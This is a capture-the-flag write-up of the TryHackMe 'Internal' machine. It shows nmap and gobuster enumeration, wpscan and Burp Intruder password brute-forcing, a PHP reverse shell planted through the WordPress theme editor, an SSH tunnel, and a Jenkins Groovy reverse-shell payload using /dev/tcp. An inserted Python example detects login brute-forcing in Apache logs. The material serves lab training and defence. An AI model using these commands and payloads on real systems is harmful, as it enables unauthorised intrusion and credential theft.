TryHackMe | Internal

Sampath Pendurthi
5 min read · Mar 9, 2021

Hello everyone, let’s solve one of the hard-rated machines. It’s none other than Internal. I don’t know why they rated it as hard; it is very easy to solve. For this, you need a little knowledge of WordPress, tunneling and bruteforcing. That’s it, let’s solve it.

Requirements:

→ WordPress

→ Tunneling

→ Jenkins

→ Password bruteforcing

Now let’s begin with an Nmap scan. By the way, I’m using Ubuntu as my attacker machine. OK, let’s begin.

I’m using nmap to find some interesting ports.

"nmap -sC -sV <IP> -vv -oN scan"

OK. There are only two ports open: SSH and Apache httpd are running on 22 and 80. The victim’s OS is Ubuntu (from the scan results).

Let’s explore the website now. But first, let me add ‘internal.thm’ to my hosts file.

There is no useful information on the default webpage, so let’s find some interesting directories. I’m using gobuster here; you can also use dirb or dirbuster.

"gobuster -u http://internal.thm -w /usr/share/dirb/wordlists/big.txt -t 50"

OK. Now I got some interesting directories. Let’s open /blog to explore.

OK, it’s just a WordPress site. We got our first point here: this site runs WordPress. Now let’s find some vulnerabilities in this site using wpscan.

"wpscan --url http://internal.thm --enumerate p,u"

With the above command, wpscan enumerates the plugins and users of the WordPress site.

From the above scan we got one user named admin, but sadly no vulnerable plugins were found. That’s OK; let’s bruteforce the credentials. wpscan can bruteforce the login credentials, so I’m using wpscan for that.

"wpscan --url http://internal.thm -U admin -P /usr/share/wordlists/rockyou.txt"

Now this gave me the password. So let’s log in with these credentials.
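Seen from the server side, a dictionary attack like the one above leaves a clear trace in Apache’s access log: a burst of POSTs to wp-login.php from one address. The Python below is an added example (not from the original write-up) that flags that pattern over constructed sample log lines; the combined log layout, the /blog/wp-login.php path, the WPScan User-Agent string and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format, as the victim's Apache httpd would write it (assumed default layout).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: 10.10.14.5 runs a dictionary attack on the /blog login; 10.10.14.9 is a
# real user who mistypes once (200) and then logs in (WordPress answers 302 on success).
SAMPLE_LOG = [
    '10.10.14.5 - - [09/Mar/2021:10:15:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "-" "WPScan v3.8.1 (https://wpscan.org/)"',
    '10.10.14.5 - - [09/Mar/2021:10:15:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "-" "WPScan v3.8.1 (https://wpscan.org/)"',
    '10.10.14.5 - - [09/Mar/2021:10:15:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "-" "WPScan v3.8.1 (https://wpscan.org/)"',
    '10.10.14.5 - - [09/Mar/2021:10:15:03 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "-" "WPScan v3.8.1 (https://wpscan.org/)"',
    '10.10.14.5 - - [09/Mar/2021:10:15:04 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "-" "WPScan v3.8.1 (https://wpscan.org/)"',
    '10.10.14.9 - - [09/Mar/2021:10:20:30 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4512 "http://internal.thm/blog/wp-login.php" "Mozilla/5.0"',
    '10.10.14.9 - - [09/Mar/2021:10:21:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "http://internal.thm/blog/wp-login.php" "Mozilla/5.0"',
]

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def find_login_bruteforce(lines, login_path="/blog/wp-login.php", threshold=5, window_s=60):
    """Return {ip: total_login_posts} for clients with >= threshold POSTs inside any window_s seconds."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start = 0                      # left edge of the sliding window
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged
```

A user who mistypes a password once or twice never reaches the threshold, while a wordlist run does so within seconds; the flagged addresses are what a fail2ban-style rule or a WordPress login-limiting plugin would act on.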

To gain a reverse shell, from the left sidebar select Appearance → Theme Editor.

Now let’s copy our reverse shell into searchresults.php. You can choose any page, but I’m going with searchresults.php. Copy the PHP reverse shell, paste it here and update the file. Now set up a listener and search for some random text in the search bar. That’s it, we are in.

Now let’s convert this shell into a stable PTY bash using python.

From here on I won’t show the passwords, only the text files.

Let’s go to the /opt folder. There we’ll get a password for a user.

So now let’s log in as that user with the password.

OK, we got the user flag. Along with the user flag we got something named jenkins.txt.

It says a Jenkins service is running on 172.17.0.2:8080. OK, there is a Jenkins service running, but we can’t access it because we are not in the same network. In such conditions there is something we can use to reach that page from our machine. It is called tunneling. Now I’m going to make a tunnel.

Now let’s create a tunnel.

"ssh aubreanna@internal.thm -L 8080:localhost:8080"

We have successfully created a tunnel between the attacker machine and the victim’s machine. Now we can access the services running on the victim’s localhost, so the Jenkins service on port 8080. Let’s explore it.

OK, it’s a Jenkins login screen, but we don’t know the password. Let’s bruteforce it. I’m using Burp Suite to do this.

Remember you are running a tunnel on 8080, so Burp won’t work because port 8080 is already in use. So change the port number to 8081 in the browser proxy and also in Burp.

Go to Proxy → Options.

Now add a new proxy listener.

In the browser, I’m using FoxyProxy.

Now let’s capture the login request. Here is the request; let’s send it to Intruder.

We only need to bruteforce the password, so select the attack type Sniper. I’m using the rockyou.txt password list.

OK, after some time I got the password: the response with length 307 stands out. Now let’s use this password to log in.

OK, we got the dashboard. Now it’s time to spawn a shell using this dashboard. For that, let’s go to Manage Jenkins → Script Console.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<IP>/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

This is the payload for Linux.

Start a netcat listener.

We got a reverse shell. Now let’s go to /opt.

We got a note.txt here. In it we have the root credentials. Now let’s go back to the tunnel we created and log in as root.

There we go, we got the root flag too. Successfully done. Let me know how you felt about it: easy, medium or hard.

Follow for more stuff like this:

Insta: https://www.instagram.com/sampath.pendurthi/

LinkedIn: https://www.linkedin.com/in/sampath-pendurthi/

THANK YOU………

HAPPY HACKING……..:)

PEACE……..:-)
